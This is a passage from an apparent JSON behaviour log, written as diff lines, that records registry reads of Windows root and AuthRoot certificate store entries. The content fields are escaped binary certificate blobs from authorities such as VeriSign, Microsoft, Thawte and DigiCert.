\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc0\\x02\\x00\\x000\\x82\\x02\\xbc0\\x82\\x02%\\x02\\x10J\\x19\\xd28\\x8c\\x82Y\\x1c\\xa5]s_\\x15]\\xdc\\xa30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1,0*\\x06\\x03U\\x04\\x0b\\x13#VeriSign Time Stamping Service Root1402\\x06\\x03U\\x04\\x0b\\x13+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc.0\\x1e\\x17\r970512000000Z\\x17\r040107235959Z0\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, I" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 308, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 309, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7f\\xdf\\xf5\\x07)Dg\\x10$JD|\\xa2\\xa1\\x97\\xea\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x9d\\xf0\\xd11\\x00\\x12:\\xec\\xa7p\\x13\\x0fJ\\xd8\\xd2\t\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x002\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00$\\\\x97\\xdfu\\x14\\xe7\\xcf-\\xf8\\xber\\xae\\x95{\\x9e\\x04t\\x1e\\x85\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x004O0-%i1\\x91\\xea\\xf7s\\\\xab\\xf5\\x86\\x8d7\\x82@\\xec \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb1\\x02\\x00\\x000\\x82\\x02\\xad0\\x82\\x02\\x16\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03U\\x04\\x0b\\x13$Microsoft Time Stamping Service Root1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.0\\x1e\\x17\r970513161259Z\\x17\r991230235959Z0\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 310, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 311, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274\\Blob", + "content": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe8G\\xc8B\\x9a\\xb0\\x9d\\xaeo\\x0b(;\\x98\\x15\\x8f\\xe3\\xb1\\xe8\\x80\\xb2\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x03\\xd1\\xc7ge\\xed\\xa8\\x8b\\xc8\\xe0\\x87^`\\x91\\xd0`C%C\\xd1\\x80\\xbc\\xb8l\\x06I6\\xad\\xb9A\\xc4!cx\\x0b\\x82\\x89\\x92\\x1a\\x94\\xfe\\xbb\\x7f\\x9eG\\xed\\xac\\x12\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x007\\x94)X\\x86*\\x06\\xe6\\xbb\\xcf\\xd7\\xabY\\xc7\\xf2\\xf6c\\xec\\xdf@0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r970110070000Z\\x17\r201231070000Z0p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft R" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 322, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 323, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob", + "content": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe8\\xa5\\x98\\xbe\\x84\\x82\\x8e\\xfe\\xaep\\x11\\x15\\x015v\\xb2\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7ffzq\\xd3\\xebix \\x9aQ\\x14\\x9d\\x83\\xda \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xbe6\\xa4V/\\xb2\\xee\\x05\\xdb\\xb3\\xd3##\\xad\\xf4E\\x08N\\xd6V\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00.\\x00\\x00\\x00T\\x00h\\x00a\\x00w\\x00t\\x00e\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x18\\x1c+\\xe0XQ\\xf9i\\x93\\xe1\\x96\\xf2y\\x95K#\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdd\\xbc\\xbd\\x86\\x9c?\\x07\\xed@\\xe3\\x1b\\x08\\xef\\xce\\xc4\\xd1\\x88\\xcd;\\x15 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xa5\\x02\\x00\\x000\\x82\\x02\\xa10\\x82\\x02\n\\xa0\\x03\\x02\\x01\\x02\\x02\\x01\\x000\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r\\x06\\x03U\\x04\n\\x13\\x06Thawte1\\x1d0\\x1b\\x06\\x03U\\x04\\x0b\\x13\\x14Thawte Certification1\\x1f0\\x1d\\x06\\x03U\\x04\\x03\\x13\\x16Thawte Timestamping CA0\\x1e\\x17\r970101000000Z\\x17\r201231235959Z0\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 324, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 325, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x009\\x1b\\xe9(\\x83\\xd5%\t\\x15[\\xfe\\xae'\\xb9\\xbd4\\x01p\\xb7k\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00J\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa4 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x9d\\x05\\x00\\x000\\x82\\x05\\x990\\x82\\x03\\x81\\xa0\\x03\\x02\\x01\\x02\\x02\\x10y\\xad\\x16\\xa1J\\xa0\\xa5\\xadLsX\\xf4\\x07\\x13.e0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate Authority0\\x1e\\x17\r010509231922Z\\x17\r210509232813Z0_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate A" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 326, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 327, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00t\\x99f\\xce\\xcc\\x95\\xc1\\x87A\\x94\\xcar\\x03\\xf9\\xb6 \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x05c\\xb8c\rb\\xd7Z\\xbb\\xc8\\xab\\x1eK\\xdf\\xb5\\xa8\\x99\\xb2MC\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O_\\x10i09\\x8d\t\\x10{@\\xc3\\xc7\\xca\\x8f\\x1c\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00E\\xeb\\xa2\\xaf\\xf4\\x92\\xcb\\x821-Q\\x8b\\xa7\\xa7!\\x9d\\xf3m\\xc8\\x0fb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00>\\x90\\x99\\xb5\\x01^\\x8fHl\\x00\\xbc\\xea\\x9d\\x11\\x1e\\xe7!\\xfa\\xba5Z\\x89\\xbc\\xf1\\xdfiV\\x1e=\\xc62\\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00m\\xca[\\xd0\r\\xcf\\x1c\\x0f2pY\\xd3t\\xb2\\x9c\\xa6\\xe3\\xc5\n\\xa6 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbb\\x03\\x00\\x000\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Ass" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 328, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 329, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob", + "content": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xf1\\xbb\\xac-\\x908\\xdd\\xec\\x8d\\xb1s\\xc5;\\xc7**\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00x*\\x02\\xdf\\xdb.\\x14\\xd5\\xa7_\n\\xdf\\xb6\\x8e\\x9c]\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x008\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00OeVc6\\xdbe\\x98X\\x1dXJYl\\x87\\x93M_*\\xb4\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00A\\x02\\x00\\x000\\x82\\x02=0\\x82\\x01\\xa6\\x02\\x11\\x00\\xe4\\x9e\\xfd\\xf3:\\xe8\\x0e\\xcf\\xa5\\x11>\\x19\\xa4$\\x0220\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r040107235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriS" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 330, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 331, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob", + "content": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O\\xcb\\x14\\xf7\\xc4\\xa3\\x8f/&\\\\x1f\\x12\\xc9\\xafVw\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xbeR\\xe4a\\xb1}\\xd6%'q%\\x1bE\\xe9\\x8f\\x122\\xca\\xa1%\\x12\\xdcy\\x11\\x8d\\x0c_\\xces\\xa5M\\x95\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00>\\x00\\x00\\x00H\\x00o\\x00t\\x00s\\x00p\\x00o\\x00t\\x00 \\x002\\x00.\\x000\\x00 \\x00T\\x00r\\x00u\\x00s\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x000\\x003\\x00\\x00\\x00b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xa3\\xcchY]\\xfe~\\x86\\xd8\\xad\\x17r\\xa8\\xb5(J\\xddT\\xac\\xe3\\xb8\\xa7\\x98\\xdfG\\xbc\\xca\\xfb\\x1f\\xdb\\x84\\xdf\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x000\\x1e\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00g\\x0eI,a\\x17\\x9e\\xeb\\xed\\xe0T\\xe7\\x84\\xd9\\x9b\\xadd`se\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00[\\xcb\\x93\\xea\\xdb}mO\\xb7\\xa0\n/:\\xe5\\x03\\x0c\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00QP\\x1f\\xbf\\xcei\\x18\\x9d`\\x9c\\xfa\\xf1@\\xc5vu]\\xcc\\x1f\\xdf\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xeb\\x15w\\xb4\\x0b<\\x8b\\xab\\xae4m\\xd9\\x8e\\xad\\x07\\x80\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00p\\x05\\x00\\x000\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 332, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 333, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x9ds\\x93y;\\xca2@1u\\xdc\\x12~\\x0e\\xc1\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00s\\xa5\\xe6J;\\xff\\x83\\x16\\xff\\x0e\\xdc\\xcca\\x8a\\x90nN\\xaeMti\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x01\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00r\\xa4\\x91\\x950\\x9f\\xb94\\xd6\n\\x98\\xe4\\xecE\\x1al\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\t\\xcbY\\x7f\\x86\\xb2p\\x8f\\x1a\\xc39\\xe3\\xc0\\xd9\\xe9\\xbf\\xbbM\\xb2#\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x000\\x14\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xc7A\\xf7\\x0fK*\\x8d\\x88\\xbf.q\\xc1A\"\\xefS\\xef\\x10\\xeb\\xa0\\xcf\\xa5\\xe6L\\xfa \\xf4\\x18\\x850s\\xe0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00S\\x00A\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x007\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00A3\\xc4\\xe6\\x0f\\xa1\\x83\\xee^zD\\x16\\xc5\\xd5L3\\x92\\xc5l/W()\\xbfY4tg\\xba\\xb0{\\xcd\\xcf\\x84\\x01b\\x98\\x83A\\xd2\\xd2\\x84\\xfb\\xd8V\\xdfS\\xb1 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\x05\\x00\\x000\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsof" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 334, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 335, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob", + "content": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd7\\xc6;\\xe0\\x83}\\xba\\xbf\\x88\\x1dO\\xbf_\\x98j\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\xfcc]\\xf6&>\r\\xf3%\\xbe_y\\xcdgg\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00F\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00u\\x00b\\x00l\\x00i\\x00c\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 